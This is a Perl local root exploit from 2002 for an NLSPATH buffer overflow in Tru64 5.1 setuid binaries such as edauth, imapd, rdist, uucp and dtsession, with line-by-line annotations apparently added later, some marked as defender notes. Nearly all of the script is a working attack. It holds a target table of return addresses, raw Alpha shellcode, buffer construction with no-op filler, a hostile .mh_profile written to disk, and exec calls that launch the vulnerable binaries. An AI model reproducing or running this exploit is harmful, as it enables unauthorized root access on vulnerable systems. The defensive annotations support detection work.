Text File  |  2005-02-12  |  3KB  |  104 lines

  1.               
  2.  
  3. #!/usr/bin/perl -w
  4. #
  5.  
  6.  
  7. # Tru64 5.1 NLSPATH
  8. #
  9. # stripey (stripey@snosoft.com) - 03/07/2002
  10. #
  11. # Target table: each value is a packed 32-bit address, then ":", the path of a binary, ":", and the privilege the author records for it (uid/euid/egid). Defender note: this doubles as the author's list of affected binaries to check for vendor fixes.
  12. $tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
  13. $tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
  14. $tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
  15. $tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
  16. $tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
  17. $tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
  18. $tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid \$DISPLAY";
  19. $tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid \$DISPLAY";
  20. $tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
  21. $tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
  22. $tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";
  23. # Argument handling: the comma operator makes the condition's value $align, so the usage text is printed whenever the third argument is missing or false (a literal 0 included).
  24. unless (($target,$offset,$align) = @ARGV,$align) {
  25.  
  26.         print "-"x72;
  27.         print "\n        Tru64 NLSPATH overflow, stripey\@snosoft.com, 03/07/2002\n";
  28.         print "-"x72;
  29.         print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
  30. # List every table entry as "key. path ( privilege note )"; the packed address in $a is not shown.
  31.         foreach $key (sort(keys %tgts)) {
  32.                 ($a,$b,$c) = split(/\:/,$tgts{"$key"});  # $a = packed address, $b = path, $c = privilege note
  33.                 print "\t$key. $b ( $c )\n";
  34.         }
  35.  
  36.         print "\n";
  37.         exit 1;
  38. }
  39. # Look up the chosen target: $a receives the packed address, $b the binary path. The key is not validated, so an unknown target leaves both undefined.
  40. ($a,$b) = split(/\:/,$tgts{"$target"});
  41.  
  42. print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
  43. # $ret: the table address plus the caller-supplied offset, packed together with a second 32-bit word 0x1 (presumably the value meant to replace a saved return address; the name is the only evidence here).
  44. $ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
  45. # $sc: an opaque run of machine-code bytes. What it does when executed cannot be determined from this listing; treat it as a hostile payload.
  46. $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
  47. $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
  48. $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
  49. $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
  50. $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
  51. $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
  52. $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
  53. $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
  54. $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
  55. $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
  56. # $tlen: how many 4-byte words remain in a 1024-byte region once $sc is accounted for.
  57. $tlen = (1024-(length($sc)))/4;
  58. # Buffer layout: $align pad bytes, then ($tlen-1) copies of the word 0x47ff041f (presumably an Alpha no-op used as filler; confirm), then $sc, then $ret.
  59. $buf .= "B"x$align;
  60. $buf .= pack("l",0x47ff041f)x($tlen-1);
  61. $buf .= $sc;
  62. $buf .= $ret;
  63. # The buffer is delivered through the NLSPATH environment variable, which the exec'd target inherits. Defender note: an NLSPATH of roughly 1 KB holding non-printable bytes in a privileged process's environment is a strong indicator of this technique.
  64. $ENV{"NLSPATH"} = $buf;
  65. # Target 8 (deliver in the table) only gets an operator prompt; no extra input is prepared for it.
  66. if ($target eq 8) { print "Hit ctrl-d...\n"; }
  67. # Targets 3 and 4 (the two mh binaries in the table) additionally get a second buffer written as the "Path:" entry of .mh_profile in the current directory. The open() result is not checked and an existing file is overwritten. Defender note: an oversized .mh_profile containing binary data is a forensic artifact of this script.
  68. if ($target eq 3) {
  69.  
  70.         $buf_b  = "AA";
  71.         $buf_b .= pack("l",0x47ff041f)x512;
  72.         $buf_b .= $sc;
  73.  
  74.         open(OH,">.mh_profile");
  75.         print OH "Path: $buf_b\n";
  76.         close(OH);
  77. }
  78. # Same construction as for target 3, but with 2000 filler words instead of 512.
  79. if ($target eq "4") {
  80.  
  81.         $buf_b  = "AA";
  82.         $buf_b .= pack("l",0x47ff041f)x2000;
  83.         $buf_b .= $sc;
  84.  
  85.         open(OH,">.mh_profile");
  86.         print OH "Path: $buf_b\n";
  87.         close(OH);
  88. }
  89. # Launch step. Each exec() is list-form, so no shell is involved, and on success it replaces this process, so nothing after it runs. The NLSPATH value set earlier is inherited by the target.
  90. if ($target eq 2) {
  91. # Target 2 (rdist in the table) is started with fixed arguments; the last one is the literal string '${a}'.
  92.         exec("$b","-d","a=asdf","-c","/tmp/","\'\$\{a\}\'");
  93.  
  94. }
  95. if ($target eq 0) {
  96. # Target 0 (edauth in the table) is also handed a 30000-byte argument of "B" characters.
  97.         $buf_b = "B"x30000;
  98.         exec("$b","-g","-dt",$buf_b);
  99.  
  100. }
  101. # Every other target is started with no arguments; an exec failure is not reported.
  102. exec("$b");
  103.  
  104.